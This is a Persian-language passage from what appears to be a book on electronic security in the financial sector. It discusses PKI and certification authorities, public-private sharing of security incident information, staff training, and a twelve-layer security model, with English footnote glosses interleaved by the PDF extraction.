‫ﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﺑﻬﺘﺮ ﻋﻤﻞ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺗ ﹺ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﻋﻨﺼﺮ ﺍﺻﻠﻲ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻮﻓﻖ ﺑﺮﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﺍﻳﻦ ﺍﺳـﺖ‬
‫ﻛﻪ ﺳﺎﺧﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣﺮﺍﻛﺰ ﻗﻀﺎﻳﻲ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺑﺎﻳـﺪ‬
‫ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﻛﻠﻴﺔ ﺗﺮﺍﻛﻨﺸﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‬
‫ﻭ ﺣﺪﻭﺩ ﺍﺧﺘﻴﺎﺭﺍﺕ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻳﻚ ﺗﺄﻳﻴﺪﻛﻨﻨﺪﻩ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤـﺎﻡ‬
‫ﺣﻮﺯﻩﻫﺎﻱ ﻗﻀﺎﻳﻲ ﻳﻜﭙﺎﺭﭼﻪ ﻭ ﺟﺎﻣﻊ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ )‪ ٤٣(PKI‬ﻭ‬
‫ﻻ ﺑﻌﻨﻮﺍﻥ ﺗﻨﻬﺎ ﺭﺍﻫﻬﺎﻱ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ ﺑـﺮﺍﻱ‬
‫ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻟﻴﻜﻦ ﺗﻮﺟﻪ ﺑﻪ ﻫﺰﻳﻨﻪﻫﺎ ﻭ‬
‫ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﻩ ﻭ ﺩﺭﻫﻢ ‪ PKI‬ﻭ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﺣﻘـﻮﻗﻲ ﺁﻥ‬
‫ﺑﺎ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ )‪ ٤٤(CAs‬ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﻳﻚ ﺭﺍﻩﺣﻞ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻣﻌﻘـﻮﻝ ﻭ ﻣﻨﺎﺳـﺐ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ‬
‫ﻣﺮﺯﻫﺎﻳﻲ ﭼﻮﻥ ﺍﻋﺘﻤﺎﺩ ﻭ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺑﺎﺷﺪ ﻭ ﺍﻳﻦ‬
‫ﭼﻨﺪﺍﻥ ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺁﻥ ﻛـﺪﺍﻡ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫‪Public Key Infrastructure‬‬
‫‪Certification Authorities‬‬
‫‪43‬‬
‫‪44‬‬
‫ﺭﻛﻦ ﺷﺸﻢ‪:‬‬
‫ﺩﻗﺖ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪،‬‬
‫ﻭ ﻫﻤﻜﺎﺭﻱ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ‬
‫ﻓﻘﺪﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺩﺭﺑﺎﺭﺓ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﻧﺘﻴﺠــﺔ ﺩﺍﻧــﺶ ﻳــﺎ ﺍﻧﮕﻴــﺰﺓ ﻛــﻢ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ‪ ،‬ﺍﻧــﺪﺍﺯﻩﮔﻴــﺮﻱ ﻭ‬
‫ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔــﺬﺍﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺳــﺖ‪ .‬ﺑــﺎ ﮔــﺴﺘﺮﺵ ﺗــﺪﺍﺭﻛﺎﺕ‬
‫ﺩﺭﻭﻥﻣـﺮﺯﻱ ﻭ ﺑــﺮﻭﻥﻣــﺮﺯﻱ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺗــﺴﻬﻴﻞ ﺩﺭ ﺍﺷــﺘﺮﺍﻙ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺩﺭﺑـﺎﺭﺓ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ‪ ،‬ﺳـﺮﻗﺖ‪،‬‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﻏﻴﺮﻩ ﺗﻮﺳﻂ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‪ ،‬ﺍﻣﻨﻴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺗﻘﻮﻳﺖ ﺧﻮﺍﻫﺪ ﺷـﺪ‪ .‬ﺑـﻪﺍﺷـﺘﺮﺍﻙ‬
‫ﻧﮕﺬﺍﺷﺘﻦ ﺍﻃﻼﻋﺎﺕ ﻧﻪ ﺗﻨﻬﺎ ﺩﺍﻧﺶ ﺭﺍ ﺩﺭ ﻳﻚ ﺳﻄﺢ ﻣﻌـﻴﻦ ﻧﮕـﻪ‬
‫ﻣﻲﺩﺍﺭﺩ‪ ،‬ﺑﻠﻜﻪ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﺔ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺑﺨـﺶ‬
‫ﺧــﺼﻮﺻﻲ )ﺷــﺎﻣﻞ ﺑﻴﻤــﻪ( ﺭﺍ ﻧﻴــﺰ ﻣﺤــﺪﻭﺩ ﻧﻤﺎﻳــﺪ‪ .‬ﺍﻳــﻦ ﻓﻘــﺪﺍﻥ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﻫﺰﻳﻨـﺔ ﺑﻴﻤـﺔ ﺷـﺮﻛﺘﻬﺎ ﻭ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧـﺼﻮﺻﻲ‬
‫ﻻﺯﻡ ﺍﺳــﺖ‪ .‬ﺑــﺮﺍﻱ ﻣﺜــﺎﻝ ﻛﻤﻴﺘــﺔ ﺭﺍﻫﺒــﺮﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺍﻣﻨﻴــﺖ ﻭ‬
‫ﻣﺨﺎﻃﺮﺓ ‪ ٤٥BIST‬ﺑﺎ ﺍﻳﺠﺎﺩ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﺍﻣﻨﻴـﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪،‬‬
‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﭼﻮﻥ ﺍﻣﻨﻴﺖ‪ ،‬ﺳﻼﻣﺖ ﻭ ﺻﺤﺖ ﭘﺮﺩﺍﺧﺘﻬﺎ ‪ ،‬ﺗﺠـﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﻣــﻮﺭﺩ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ‬
‫ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳـﻦ ﺁﺯﻣﺎﻳـﺸﮕﺎﻩ ﻫﻤﭽﻨـﻴﻦ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺩﺭﺑـﺎﺭﺓ‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺴﻬﻴﻞ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻭﺟﻮﺩ ﺍﺗﺤﺎﺩ ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧـﺖ‪ ،٤٦‬ﺗﻴﻤﻬـﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺧــﺪﺍﺩ ﻭ ﻭﺍﻛــﻨﺶ‪ ،٤٧‬ﻭ ﻣﺮﻛــﺰ ﻓﻮﺭﻳﺘﻬــﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ‬
‫)‪ ٤٨(CERT‬ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﻤﻜـﺎﺭﻱ‬
‫ﻣﺘﻘﺎﺑﻞ ﺑﺎﻋﺚ ﺍﺷﺘﺮﺍﻙ ﻓﺰﺍﻳﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﻭ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣـﻲﺷـﻮﺩ‪ .‬ﻳـﻚ‬
‫ﻋﻨﺼﺮ ﻣﺸﺘﺮﻙ ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﻋﺎﻳـﺖ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﻭ‬
‫ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪ :‬ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﻭ ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ‪ ،‬ﻫﻮﻳﺖ ﻣﻨﺎﺑﻊ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺧﻮﺩ ﺭﺍ ﻓﺎﺵ ﻧﻤﻲﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﻧﻘـﺶ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﭼﻨﺪﺟﺎﻧﺒﻪ ﺩﺭ ﺗﺴﻬﻴﻞ ﻫﻤﻜﺎﺭﻱ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﺭﺳﻲ ﺩﺍﺭﺩ‪.‬‬
‫ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﭼﻪ ﺍﻗﺘﺼﺎﺩ ﻣﻨﺴﺠﻢﺗﺮ ﺷﻮﺩ‪ ،‬ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ‬
‫‪BIST's Security and Risk Assessment‬‬
‫‪Steering Committee‬‬
‫‪Internet Security Alliance‬‬
‫‪Forum of Incident and Response Security‬‬
‫‪Teams‬‬
‫‪Computer Emergency Response Team‬‬
‫‪45‬‬
‫‪46‬‬
‫‪47‬‬
‫‪48‬‬
‫‪١٣٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺍﻧﺠﺎﻡﺷﺪﻥ ﻣﺴﺌﻮﻟﻴﺖ ﻫﺮ ﺑﺨﺶ ﺍﻫﻤﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛ ﻭ‬
‫ﻲ ﺍﻣـﺮﻭﺯ‪ ،‬ﺩﺭ ﺁﻏـﺎﺯ‬
‫ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟ ﹺ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺑـﻮﺩ ﻛـﻪ ﻭﺍﺑـﺴﺘﮕﻴﻬﺎﻱ ﺩﺭﻭﻧـﻲ ﺍﻳـﻦ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﻭ ﺑﻴﺸﺘﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻧﻈﺎﺭﺗﻲ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻧـﻮﻳﻦ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ‬
‫ﻧﻈﻴﺮ ﻃﺮﺣﻬﺎﻱ ﺗﺒﺎﺩﻝ ﻓﻌﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ؛‬
‫ﺭﻛﻦ ﻫﻔﺘﻢ‪:‬‬
‫ﺁﻣﻮﺯﺵ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫•‬
‫ﺗﺪﻭﻳﻦ ﻳﻚ ﻃﺮﺡ ﭼﻨﺪﻣﻨﻈﻮﺭﺓ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺮﺍﻱ ﺁﻣـﻮﺯﺵ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﺁﻳﻨﺪﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﺑﻄﻮﺭ ﻫﻤﺰﻣـﺎﻥ‬
‫ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺩﺍﻧﺶ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ‪.‬‬
‫ﺗﺤﻠﻴﻞ ﺁﻣﺎﺭﻱ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺑﻴﺶ ﺍﺯ‬
‫‪ %۵۰‬ﺣﻤﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ‬
‫ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﺗﺤﺼﻴﻼﺕ ﻛـﻢ‬
‫ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤـﻼﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺁﺳـﻴﺐﭘـﺬﻳﺮﺗﺮ ﺍﺳـﺖ‪ .‬ﺑـﺮﻋﻜﺲ‪،‬‬
‫ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﻛﻪ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺁﮔـﺎﻩ ﺍﺳـﺖ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻻﻳﺔ ﻣﺆﺛﺮ ﺣﻔﺎﻇﺘﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻴﺎﻓﺰﺍﻳﺪ‪.‬‬
‫ﺭﻛﻦ ﻫﺸﺘﻢ‪:‬‬
‫ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﺍﻭﻟﻴﺔ ﺁﻣﻮﺯﺷﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺍﻋﻢ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ‪ -‬ﻛﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ‬
‫ﺑﻪ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ‪ -‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺑـﺮﺍﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﻗـﺪﺍﻣﺎﺕ‬
‫ﺍﻭﻟﻴﻪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻣﻲﺷﻮﻧﺪ‪:‬‬
‫•‬
‫ﺍﺭﺗﻘﺎﻱ ﺁﮔﺎﻫﻲ ﻭ ﺁﻣﻮﺯﺵ ﺍﻓـﺮﺍﺩ ﺑﺨـﺶ ﻣـﺎﻟﻲ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺍﺻﻮﻝ ﺍﺧﻼﻗﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺭﻓﺘـﺎﺭ ﻣﻨﺎﺳـﺐ ﻛـﺎﺭﺑﺮ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ؛‬
‫•‬
‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ‬
‫ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺭﻓﺘﺎﺭ ﺩﺭﺳﺖ ﻭ ﺭﺍﻫﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺑـﺮﺍﻱ‬
‫ﮔﺰﺍﺭﺵ ﺣﻤﻼﺕ ﻳﺎ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺎ ﻫﻤﺎﻫﻨﮕﻲ ﻛﺎﻣﻞ ﺑﺎ ﺗﻤـﺎﻡ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺗﻜﻤﻴـﻞ ﺍﻃﻼﻋـﺎﺕ ﺟﻬـﺎﻧﻲ‬
‫ﺩﺭﺑﺎﺭﺓ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ؛‬
‫•‬
‫ﻱ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻧﻮﻳﻦ ﺩﺭﺑـﺎﺭﺓ‬
‫ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻣﺠﺎﻣﻊ ﺑﺎﻧﻜﺪﺍﺭ ﹺ‬
‫‪٤٩‬‬
‫ﻧﻴﺎﺯ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧـﺪﺍﺩ ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ‬
‫ﺣﺎﺩﺛﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ؛‬
‫•‬
‫ﺗﺴﻬﻴﻞ ﻫﻤﻜﺎﺭﻱ ﻭ ﺍﻧﺘﻘﺎﻝ ﺩﺍﻧﺶ ﻣﻴﺎﻥ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ‪،‬‬
‫ﻭﺍﺣــﺪﻫﺎﻱ ﺍﻃﻼﻋــﺎﺕ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ‪ ٥٠‬ﻭ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﺟﺰﺍﻱ ﺑﻨﻴﺎﺩﻱ ﻳﻚ‬
‫ﻃــﺮﺡ ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺣﻔــﻆ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﻭ ﻛــﺎﻫﺶ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺩﺍﺭﺍﻱ ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ ﺑﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳﻨـﺪ‪.‬‬
‫ﺍﻳﻦ ﺳﻠﺴﻠﺔ ﺩﻭﺍﺯﺩﻩ ﻻﻳﻪﺍﻱ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﻫـﺮ ﺷـﺮﺍﻳﻂ‬
‫ﻛﺪﺍﻡ ﻣﻜﺎﻧﻴﺰﻡ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ؛ ﻭ ﻫﻤﭽﻨﻴﻦ‬
‫ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﻫﺮ ﺷﺒﻜﻪ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺿـﻌﻴﻔﺘﺮﻳﻦ ﻋﻨـﺼﺮ‬
‫ﺁﻥ ﺷﺒﻜﻪ ﺍﺳﺖ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﻃـﺮﺡ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪﺍﻱ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﺍﻧﺘﻬﺎﻱ ﻫﻤﻴﻦ ﺑﺨﺶ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﺒﺼﺮﻩﻫﺎ‬
‫ﺑﺨﺶ ﺳﻮﻡ ﻭ ﭼﻬﺎﺭﻡ ﻛﺘﺎﺏ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻣﺤﻴﻄﻬـﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺷﻜﻞﮔﻴﺮﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﻳـﻚ‬
‫ﺭﻭﺵ ﺿﺎﺑﻄﻪﻣﻨﺪ ﺗﻼﺵ ﺩﺍﺭﻧﺪ ﺍﻗﺘﺼﺎﺩ ﻭ ﻗﺎﻧﻮﻥ ﻭ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ‬
‫ﺗﻨﺎﺳﺐ ﻳﻜﺪﻳﮕﺮ ﻫﻤﺎﻫﻨﮓ ﻛﻨﺪ‪ .‬ﺑﻪ ﻋﻠﺖ ﺭﺷـﺪ ﺳـﺮﻳﻊ ﺟﻬـﺎﻧﻲ‪،‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﻟﺒﻲ ﻣﺮﻣﻮﺯ ﺩﺍﺭﺩ‪ .‬ﻏﺎﻟﺐ ﻛـﺸﻮﺭﻫﺎ ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﺁﻧﻬﺎ ﻛﻪ ﺗﺠﺮﺑﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ ﻫﻨـﻮﺯ ﺍﺯ‬
‫ﺩﺍﻧﺶ ﺍﻧﺪﻛﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻧﻮﻳﻦ ﺣﺘـﻲ‬
‫ﺍﺯ ﺍﻳﻦ ﻫﻢ ﻛﻤﺘـﺮ ﻣـﻲﺩﺍﻧﻨـﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ‬
‫ﺁﻣﻮﺯﻩﻫﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺍﺭﺩ؛ ﭼﺮﺍﻛـﻪ ﻣﺤـﻞ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺩﻩ ﻭ ﺯﻣﺎﻥ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﺠﺮﺑﺔ ﻣﺰﺍﻳـﺎ ﻭ ﻣﻌﺎﻳـﺐ ﺁﻥ‬
‫ﺩﺍﺷﺘﻪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍ ﺑﻮﺟـﻮﺩ‬
‫ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪ ٥٢.‬ﺩﺭ ﺗﺪﻭﻳﻦ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﻓﻌﺎﻟﻴــﺘﻬﺎ ﻭ ﺗﺠـﺎﺭﺏ‬
‫‪Financial Stability Institute‬‬
‫‪Incident Response Plan‬‬
